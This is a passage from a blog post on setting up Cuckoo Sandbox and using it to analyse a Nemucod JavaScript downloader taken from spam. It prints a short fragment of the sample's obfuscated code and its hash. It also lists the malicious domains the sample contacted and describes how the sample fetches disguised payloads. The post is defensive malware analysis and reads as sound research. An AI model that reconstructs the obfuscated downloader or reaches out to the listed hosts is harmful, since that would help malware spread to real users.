scan and handing over a 100+ report to your customer will not be of much value for a customer.

What is Cuckoo?

Ok, long enough disclaimer for using advanced tools made by the open-source infosec community. One such tool, or more precisely one such system, is cuckoo.

What is it? In three words, Cuckoo Sandbox is a malware analysis system.

In other words, you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide you back some detailed results outlining what such file did when executed inside an isolated environment.

Malware is the swiss-army knife of cybercriminals and any other adversary to your corporation or organization.

In these evolving times, detecting and removing malware artifacts is not enough: it’s vitally important to understand how they operate in order to understand the context, the motivations and the goals of a breach, for better protecting in the future

Cuckoo Sandbox is a free software that automated the task of analyzing any malicious file under Windows, OS X, Linux, and Android.

Source: https://cuckoosandbox.org/

General Cuckoo Setup.

I’m not going to give an extensive overview of how Cuckoo works. If you want a more detailed overview a good start would be the main Cuckoo page.

The basic setup I use consists of Ubuntu 16.0.4.1 LTS with all Cuckoo requirements installed inluding MongoDB and Python 2.7 and Virtualbox. MongoDB is needed if you want to run the Django-based web interface and virtualbox is off-course needed to have a virtual environment in which to run the sandboxed clients. A good start to get your setup going = http://docs.cuckoosandbox.org/en/latest/installation/host/requirements/

I have a windows 7 image running (64-bit) on Virtualbox, network in Host only mode, with Python 2.7 (completely) installed, the Cuckoo agent in the startup folder and the python imaging library (1.1.7) for windows installed. The latter is needed for the screenshots which are made during a malware run on the client. What I also installed (on the host) is the tesseract and suricata. The first for the screenshots (in combination with the python image library on the client) and the latter is a free and open source, mature, fast and robust network threat detection engine. Cuckoo sends the captured network traffic (pcap) to the suricate engine for analysis against the available rules.

IP Tables are adjusted to route traffic from the host-only network to internet and back. I do not use Nat or Bridge mode.

So basically I’m running all components on one host. I did not dive into the scaling options but I’m sure you can split the components (reporting, core, db) the way you want depending on your needs. Also different kinds of virtualization software are supported.

The Nemucod sample

In figuring out the exact workings of the Nemucod sample in my spam, I struggled with the obfuscation used by the author to make the sample very difficult to read. Probably the more samples you see, the easier it gets to immediately see the structure and the methods used.There are no easy to read strings so you cannot see which websites the sample contacts or what exactly is going on. The author of this sample calls it the Maze. (Maze.shuffle) Some part of the sample is also base64 encoded.

I have mailed Kahu Security about the sample and probably he is going to have a more detailed blog post about the sample.

So aside of throwing the Nemucod sample in the Cuckoo black box, I also have a printed version to learn from. A good book making this task easier is “Practical malware analysis” by Michael Sikorski and Andrew Honig”

Some sample code:

var efioppocsonny5jjik = "QURPREIuU3RyZWFt".efioppocAIRJORDAN(); 
 
var efioppocsonny5VARDOCF ="JVRFTRUCHIDOVAlRUCHIDO".efioppocAIRJORDAN(); 
String.prototype.efioppocsonny5center2 = function () { 
 var efioppoc44_H11_L22 = { 
 efioppocSUyaWON: this 
 }; 
 efioppoc44_H11_L22.efioppocsonny5VARDOCE = efioppoc44_H11_L22.efioppocSUyaWON["c3VRUCHIDOic3RyRUCHIDOaW5RUCHIDOn".efioppocAIRJORDAN()](efioppocsonny5DRUZA, efioppocsonny5chosen); 
 return efioppoc44_H11_L22.efioppocsonny5VARDOCE; 
}; 
var efioppocsonny5sirdallos ="RUCHIDORXhwYW5RUCHIDOkRW52aXRUCHIDOJvbm1lbnRTdHJRUCHIDOpbmdz".efioppocAIRJORDAN(); 
var efioppocsonny5Native = function(options){

I have submitted the sample using the submit option on the local website (runs by default on http://127.0.0.1:8000/ . Cuckoo automatically restores a predefined snapshot, starts the client (Windows 7 Machine), uploads the sample to the local machine and subsequently runs it using the configured settings. Data from the analysis (screenshots, network captures and much more) is sent to the host and the client is shutdown again. One important setting is to make use of the so called “dirty line”. This is the internet connection. You can run a sample without it being able to reach the outside world. In my case I want to enable the sample to reach out to the internet because I want to know what kind of data is fetched and from which locations. Be careful with this, you don want to end up looking at a web page with a timer and some instructions to how to pay in bitcoins to decrypt your files again.

Cuckoo

Cuckoo output of Nemucod sample

In the screenshot below you see a part of the summary page which is generated by the reporting server. There is just too much information in there to cover everything in short blog post. And I did not even enabled all possible reports or auxiliary options.

Cuckoo Analysis

  1. Behavioural Analysis -> here you find – whatś in the name -, a detailed analysis of the behavior of the sample when run on the client machine (in my case Windows 7 64 bit)
  2. Network Analysis -> here you find information about contacted hosts, DNS queries made, tcp packages sent, UDP packages sent, HTTP/HTTPS request made, ICMP traffic, IRC traffic, Suricata analysis, and if you use SNORT some output from SNORT.
  3. Dropped files -> this will show the files which were downloaded by the sample.
  4. Process memory -> you can disable this if you want. It will give a lot of information which is found in memory. The default list worries me a bit 🙂 Just take a look at it after submitting a benign file such as notepad.exe to Cuckoo.

About Nemucod

In the previous screenshot (5) you see the hashes calculated for this sample:

SHA256: 2d188dc6d2890ec1f33bb806382b377190a73492daea4ac1d643f949d878ad8c and others.

U can use the hash to see if this sample was already analyzed by somebody else and which anti-virus vendors will recognize the sample. Best site to go to is virustotal.

This sample, with this specific hash. has a detection ratio of 24/54. From the results you can see that the sample is a branch of other malware. This specific sample has a jobid named “uDvjhoi”. Probably the jobid is linked to a specific payload with specific actions. So the sample acts as an agent, much like a SCCM agent, waiting for jobs to execute.

Cuckoo WebsitesIn the second part of the summary you can quickly see which websites are approached by the sample. You see 4 request, from which only 1,drsearscoach.com, was successful. 3 of the sites have been notified and took countermeasures.

The keygame.com website gives the following error upon receiving the get request ->

buffer: <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don’t have permission to access /g7fb6v on this server.<br /> </p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
request_handle: 0x0000000000cc0014

The naturesagro.com website gives the following error upon receiving the get request:

<b>Important note for site admins: </b>If you are the administrator of this website note that your access has been limited because you broke one of the Wordfence firewall rules. The reason your access was limited is: <b>”Access from your area has been temporarily limited for security reasons”</b>. <br /><br /> If this is a false positive, meaning that your access to your own site has been limited incorrectly, then you will need to regain access to your site, go to the Wordfence “options” pa

The kv6j.net swebsite fives the following error upon receiving the get request:
00000000: 4854 5450 2f31 2e31 2034 3033 2046 6f72 HTTP/1.1.403.For
00000010: 6269 6464 656e 0d0a 4461 7465 3a20 5765 bidden..Date:.We
00000020: 642c 2031 3920 4f63 7420 3230 3136 2031 d,.19.Oct.2016.1
00000030: 383a 3330 3a35 3820 474d 540d 0a53 6572 8:30:58.GMT..Ser
00000040: 7665 723a 2041 7061 6368 650d 0a43 6f6e ver:.Apache..Con

In the screenshot below you see that more DNS queries have been made. veddanagor.net, stenokeud.org & oofyming.com are taken offline so no response seen. msftncsi.com is used by Windows 7 to do some network checks.

Cuckoo DNS

Below you see some information about the two files downloaded by the sample. One thing I need to find out is if it’s possible with cuckoo to also run these files or give the downloader the opportunity to process the downloaded files. Both files will be processed to become executable files. Malware tries to trick IDS/IPS systems by dowloading normal looking idata instead of data which triggers those systems and block the download (such as .exe files Once downloaded the data is processed with as result a file that can be run in windows (this sample).

Cuckoo Malware

The screenshots for this sample are not that interesting. They show just a boring windows 7 desktop. No action going on.

There is really much much more to say about Cuckoo and this sample. Cuckoo is a perfect framework or system that allows you to analyze malware. It’s a good first step to see what happened during a security incident. You take the sample, feed it to cuckoo, and see what actions were performed by that specific sample. Did it spread to other servers? What was downloaded? Who is in control of the malware? Which actions were performed on the local server? It will give you a lot off information which you can use to adjust your security policy (on paper and in practice) and which you can use to respond to a security incident. (block trafffic/ip’s/websites, blacklist certain files from running with policies….)

Needless to say that setting up a Cuckoo Sandbox in a corporate environment needs to be implemented very carefully and not on a Monday morning. One can always go to malwr.com and use the online version of Cuckoo. It will have the disadvantage that it does not resemble the corporate setup, but off course the advantage of having 0 risk to infect yourself. (site seems to have some difficulties the last 24 hours)

Please leave some comments if you have questions. The above was not meant to be a complete overview of Cuckoo nor an in depth, annotated analysis of Nemucod.